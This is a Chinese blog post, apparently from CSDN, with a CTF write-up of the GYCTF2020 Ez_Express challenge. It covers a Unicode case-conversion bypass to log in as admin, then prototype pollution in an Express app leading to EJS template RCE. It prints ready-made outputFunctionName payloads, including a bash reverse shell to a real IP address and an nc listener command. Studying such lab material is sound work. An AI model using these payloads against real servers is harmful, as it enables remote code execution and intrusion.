nodejs——ejs模版遇到原型链污染产生rce

最新推荐文章于 2024-10-04 15:58:24 发布
最新推荐文章于 2024-10-04 15:58:24 发布
阅读量392 收藏 5
点赞数 5
文章标签: nodejs原型链污染
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756016/article/details/139814265
版权

[GYCTF2020]Ez_Express

打开是一个登陆框

在源代码中找到

在代码里找到敏感关键字

找到merge 想到原型链污染

这里登陆只能用ADMIN才能登陆成功

但是这里index.php又设置了一个waf ban了admin的大小写

这里需要绕过这个waf

看注册这段代码

用的是这个toUpperCase()函数

之前学过这个函数的绕过

在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。

可以构造admın绕过

成功登陆进去

后面参考wp

需要用到ejs模版

Ejs简介:

EJS是一个javascript模板库,用来从json数据中生成HTML字符串

  • 功能:缓存功能,能够缓存好的HTML模板;
  • <% code %>用来执行javascript代码
  • 安装:
$ npm install ejs

看了一圈这个写的最详细

Express+lodash+ejs: 从原型链污染到RCE

懂了个大概吧

就是

还有这篇文章

从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台

大概意思就是说ejs在渲染的时候有大量代码拼接

然后我们通过原型链污染达到变量覆盖

就可以构造注入

先闭合上面的语句

再构造rce的语句

给出几个 ejs 模板引擎 RCE 常用的 POC:

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').execSync('calc');var __tmp2"}}

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').exec('calc');var __tmp2"}}

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}

exp

先用post 访问/action 触发copy 构造原型链污染

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/182.254.242.167/8888 0>&1\"');var __tmp2"}}

再用GET 方法访问/info

用ejs渲染

 nc -lvnp 8888

用自己的vps反弹shell

阿呆不呆@qq
关注
NodeJS——服务器端JavaScript运行环境.pdf
11-29
NodeJS——服务器端JavaScript运行环境.pdf
nodejs——原型链污染
m0_73756016的博客
06-12 1098
参考滑动验证页面。
js原型链污染
最新发布
2301_79700060的博客
10-04 958
如果可以控制a、b、value的值,将a设置为__proto__,我们就可以给object对象的原型设置一个b属性,值为value。这样所有继承object对象原型的实例对象在本身不拥有b属性的情况下,都会拥有b属性,且值为value。demo在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染
CTFshow--nodejs 原型链污染
pwfortune的博客
07-27 767
flag是一个变量, 但是也不可能知道flag的值是多少, 就不可能用上一道题的方法了.给了源码, 看到 login.js 里面有个copy() 函数。都是 对象, 在执行 copy 操作 ,构造一个请求体污染了。可以看到它的源码做了一点更改, 本地测试一下, 看看如何污染。这一题里面没有了 /api 路由 ,需要找到其他的污染口。是否有 ctfshow不重要, 让它的原型拥有就行,构造相应的query的值, 得到想要执行的结果。需要嵌套两层才能污染, 其他的跟上一题是一样的。
Ejs模板引擎注入实现RCE
2302_76827504的博客
04-12 1547
EJS是一个javascript模板,用来从json数据中生成HTML字符串。
ejs原型链污染rce分析
lastwinn的博客
02-07 931
记录自己的所学以及理解
【web安全】Nodejs原型链污染分析
「 虚幻私塾」
02-14 871
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
nodejsejs生成html页面,nodejs express ejs html模板配置修改
weixin_36243860的博客
06-04 509
这几天接触Node.js + Express,实然发现无论使用jade还是ejs模板系统都会自动创建一个layout.(jade|ejs)文件。并且以文件名约定的方式使用,而 非在代码中指定Layout。但是在实际的项目中往往可能需要多个Layout文件来渲染页面板式,模板系统的创建者不可能没有这方面的考虑。那么应该如 何实现哪?网上有很多相关的nodejs express ejs模板的代码.但...
NodeJs——入门必看攻略
11-22
npm 是 nodejs 的包管理和分发工具。它可以让 javascript 开发者能够更加轻松的共享代码和共用代码片段,并且通过 npm 管理你分享的代码也很方便快捷和简单。 一 NodeJs安装与NPM管理 安装 前往NodeJs官网,下载...
nodejs使用ejs模板引擎excel转为txt文件
正在加载
07-18 523
nodejs使用ejs模板引擎excel转为txt文件新建项目创建文件安装依赖包合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 新建项目 创建文件 在桌面创建一个文件夹,鼠标右键点击 Git Bash Here 打开 git bash 执行
使用Node.js和EJS模板Node.js和EJS模板搭建Web网站
EipGemms的博客
09-27 458
在本篇文章中,我们将学习如何使用Node.js和EJS模板来快速搭建一个简单的Web网站。Node.js是一个基于JavaScript的运行时环境,它可以让我们在服务器端使用JavaScript来编写代码。而EJS(Embedded JavaScript)是一种简单而灵活的模板引擎,它可以帮助我们在服务器端生成动态的HTML内容。让我们逐步进行。
【Node.js】ejs
小秀的博客
10-14 2287
EJS(Embedded JavaScript)是一款流行的模板引擎,可以用于在Express中创建动态的HTML页面。它允许在HTML模板中嵌入JavaScript代码,并且能够生成基于数据的动态内容。标记包裹一段JavaScript代码,可以进行循环、条件判断和其他逻辑操作。的文件夹(如果没有的话),然后在该文件夹中创建一个EJS视图文件,比如。方法来渲染EJS视图文件,并传递数据给模板。在上面的示例中,当用户访问根URL时,将渲染名为。使用EJS模板:在路由处理程序中,使用。的视图文件,并提供名为。
[GYCTF2020]Ez_Express
m0_63045593的博客
04-22 2229
[GYCTF2020]Ez_Express dirsearch 扫到源码 www.zip 首先回顾一下原型链污染 在我们调用一个对象的某属性时: 1.对象(obj)中寻找这一属性 2.如果找不到,则在obj.__proto__中寻找属性 3.如果仍然找不到,则继续在obj.__proto__.__proto__中寻找这一属性 以上机制被称为js的prototype继承链。而原型链污染就与这有关 原型链污染定义: 如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象
NodeJS原型链污染&ctfshow_nodejs
leekos的博客,分享web安全相关知识~
08-05 1744
最近又遇到了有关原型链污染的题目,所以在此总结一下,方便回顾。
CTFSHOW-nodejs
m0_74606212的博客
04-28 171
下载附件,添加后缀 .zip,之后打开,发现有两个文件login.js和user.jstrue所以输入的用户名为ctfshow,密码为123456得到flag。
nodejs 使用express把文件后缀从ejs换成html
ppwwp的专栏
04-19 1388
相对于ejs作为后缀,没有html最为后缀更为通用,所以找到方法换一下方便前后台开发对接: 1.app.js头引入ejs var ejs = require('ejs'); 2.注册html模板引擎: app.engine('html',ejs.__express); 3.将模板引擎换成html: app.set('view engine', 'html'); 4.修改模...
Node.js-EJS模板
qq_43812731的博客
08-23 664
EJS是一个JavaScript模版,用来将EJS模版结合着JSON数据转换为HTML 并且可以直接在模版中写JavaScript的语法 安装ejs包 //控制台输入 npm i ejs 简单示例 let template = '<h1>Hello, <%= name %></h1>' let data = { name: 'World' } let renderStr = ejs.render(template, data) console.log(rend
nodejs实现原型链污染
09-12
在Node.js中,原型链污染是一种特殊的攻击技术,它利用JavaScript的原型继承机制来修改对象的原型链并注入恶意代码。通过修改对象的原型链,攻击者可以影响对象的行为并执行恶意操作。 实现原型链污染的过程如下: 1. 攻击者首先要找到一个合适的目标对象,该对象通常是在代码中被使用的,并且具有对外部输入进行处理的功能。 2. 攻击者通过修改目标对象的原型链,向其原型对象中添加恶意代码或属性。这通常是通过修改被攻击对象的__proto__属性来实现的。 3. 当目标对象在后续的代码中被使用时,恶意代码或属性将会被执行或访问。 例如,在Node.js中,如果一个Web应用程序使用了一个处理JSON数据的,并且对外部的JSON数据没有进行充分的验证和过滤,那么攻击者可以通过构造恶意的JSON数据来实现原型链污染。攻击者可以将恶意代码添加到JSON数据中的__proto__属性,当应用程序解析并使用该JSON数据时,恶意代码将被执行。 总结起来,Node.js的原型链污染是一种利用JavaScript的原型继承机制来修改对象的原型链并注入恶意代码的攻击技术。攻击者可以通过修改目标对象的__proto__属性来实现原型链污染,并在后续的代码中执行恶意操作。因此,在开发过程中,需要注意对外部输入的验证和过滤,以防止原型链污染攻击的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值